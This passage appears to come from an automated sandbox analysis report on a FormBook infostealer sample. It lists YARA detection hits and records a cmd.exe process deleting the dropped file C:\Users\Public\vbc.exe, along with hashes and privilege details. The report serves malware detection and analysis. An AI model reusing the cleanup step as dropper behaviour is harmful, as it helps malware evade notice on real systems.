                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  General

                                                                                                                                                  Start time:13:18:20
                                                                                                                                                  Start date:08/04/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x4a180000
                                                                                                                                                  File size:302592 bytes
                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >